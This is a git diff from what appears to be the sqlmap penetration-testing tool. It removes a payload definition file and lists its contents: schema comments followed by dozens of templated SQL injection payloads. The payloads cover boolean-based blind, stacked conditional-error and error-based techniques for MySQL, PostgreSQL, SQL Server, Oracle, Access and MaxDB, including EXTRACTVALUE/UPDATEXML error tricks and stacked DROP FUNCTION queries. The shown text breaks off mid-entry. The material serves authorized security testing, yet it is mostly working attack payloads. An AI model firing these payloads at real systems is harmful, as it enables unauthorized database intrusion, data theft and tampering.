 xml/payloads/05_time_blind.xml      | 1574 ++++++++++
 xml/payloads/06_union_query.xml     |  742 +++++
 7 files changed, 4298 insertions(+), 4288 deletions(-)
 delete mode 100644 xml/payloads/00_payloads.xml
 create mode 100644 xml/payloads/01_boolean_blind.xml
 create mode 100644 xml/payloads/02_error_based.xml
 create mode 100644 xml/payloads/03_inline_query.xml
 create mode 100644 xml/payloads/04_stacked_queries.xml
 create mode 100644 xml/payloads/05_time_blind.xml
 create mode 100644 xml/payloads/06_union_query.xml

diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml
deleted file mode 100644
index 7799d4b66..000000000
--- a/xml/payloads/00_payloads.xml
+++ /dev/null
@@ -1,4288 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-
-<!--
-Tag: <test>
-    SQL injection test definition.
-
-    Sub-tag: <title>
-        Title of the test.
-
-    Sub-tag: <stype>
-        SQL injection family type.
-
-        Valid values:
-            0: Heuristic check to parse response errors
-            1: Boolean-based blind SQL injection
-            2: Error-based queries SQL injection
-            3: UNION query SQL injection
-            4: Stacked queries SQL injection
-            5: Time-based blind SQL injection
-            6: Inline queries SQL injection
-
-    Sub-tag: <level>
-        From which level check for this test.
-
-        Valid values:
-            1: Always (<100 requests)
-            2: Try a bit harder (100-200 requests)
-            3: Good number of requests (200-500 requests)
-            4: Extensive test (500-1000 requests)
-            5: You have plenty of time (>1000 requests)
-
-    Sub-tag: <risk>
-        Likelihood of a payload to damage the data integrity.
-
-        Valid values:
-            0: No risk
-            1: Low risk
-            2: Medium risk
-            3: High risk
-
-    Sub-tag: <clause>
-        In which clause the payload can work.
-
-        NOTE: for instance, there are some payload that do not have to be
-        tested as soon as it has been identified whether or not the
-        injection is within a WHERE clause condition.
-
-        Valid values:
-            0: Always
-            1: WHERE / HAVING
-            2: GROUP BY
-            3: ORDER BY
-            4: LIMIT
-            5: OFFSET
-            6: TOP
-            7: Table name
-            8: Column name
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <where>
-        Where to add our '<prefix> <payload><comment> <suffix>' string.
-
-        Valid values:
-            1: Append the string to the parameter original value
-            2: Replace the parameter original value with a negative random
-               integer value and append our string
-            3: Replace the parameter original value with our string
-
-    Sub-tag: <vector>
-        The payload that will be used to exploit the injection point.
-
-    Sub-tag: <request>
-        What to inject for this test.
-
-        Sub-tag: <payload>
-            The payload to test for.
-
-        Sub-tag: <comment>
-            Comment to append to the payload, before the suffix.
-
-        Sub-tag: <char>
-            Character to use to bruteforce number of columns in UNION
-            query SQL injection tests.
-
-        Sub-tag: <columns>
-            Range of columns to test for in UNION query SQL injection
-            tests.
-
-    Sub-tag: <response>
-        How to identify if the injected payload succeeded.
-
-        Sub-tag: <comparison>
-            Perform a request with this string as the payload and compare
-            the response with the <payload> response. Apply the comparison
-            algorithm.
-
-            NOTE: useful to test for boolean-based blind SQL injections.
-
-        Sub-tag: <grep>
-            Regular expression to grep for in the response body.
-
-            NOTE: useful to test for error-based SQL injection.
-
-        Sub-tag: <time>
-            Time in seconds to wait before the response is returned.
-
-            NOTE: useful to test for time-based blind and stacked queries
-            SQL injections.
-
-        Sub-tag: <union>
-            Calls unionTest() function.
-
-            NOTE: useful to test for UNION query (inband) SQL injection.
-
-    Sub-tag: <details>
-        Which details can be infered if the payload succeed.
-
-        Sub-tags: <dbms>
-            What is the database management system (e.g. MySQL).
-
-        Sub-tags: <dbms_version>
-            What is the database management system version (e.g. 5.0.51).
-
-        Sub-tags: <os>
-            What is the database management system underlying operating
-            system.
-
-    <test>
-        <title></title>
-        <stype></stype>
-        <level></level>
-        <risk></risk>
-        <clause></clause>
-        <where></where>
-        <vector></vector>
-        <request>
-            <payload></payload>
-            <comment></comment>
-            <char></char>
-            <columns></columns>
-        </request>
-        <response>
-            <comparison></comparison>
-            <grep></grep>
-            <time></time>
-            <union></union>
-        </response>
-        <details>
-            <dbms></dbms>
-            <dbms_version></dbms_version>
-            <os></os>
-        </details>
-    </test>
--->
-
-<root>
-    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause</title>
-        <stype>1</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
-        <request>
-            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
-        </request>
-        <response>
-            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
-
-    <!-- Boolean-based blind tests - Parameter replace -->
-    <test>
-        <title>Generic boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
-        <request>
-            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
-        </request>
-        <response>
-            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
-        <request>
-            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
-        </request>
-        <response>
-            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>([INFERENCE])*[ORIGVALUE]</vector>
-        <request>
-            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
-        </request>
-        <response>
-            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
-        <request>
-            <payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
-        </request>
-        <response>
-            <comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
-        <request>
-            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
-        </request>
-        <response>
-            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft Access</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
-        <request>
-            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
-        </request>
-        <response>
-            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-    <!-- End of boolean-based blind tests - Parameter replace -->
-
-
-    <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
-        <request>
-            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
-        </request>
-        <response>
-            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft Access</dbms>
-        </details>
-    </test>
-    <!-- TODO: check against SAP MaxDB -->
-    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
-
-
-    <!-- Stacked conditional-error blind queries tests -->
-    <test>
-        <title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
-        <request>
-            <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL stacked conditional-error blind queries</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>2</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
-        <request>
-            <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-    <!-- End of stacked conditional-error blind queries tests -->
-
-    <!-- Error-based tests - WHERE or HAVING clause -->
-    <test>
-        <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
-        <request>
-            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.5</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
-        <request>
-            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 4.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
-        <request>
-            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
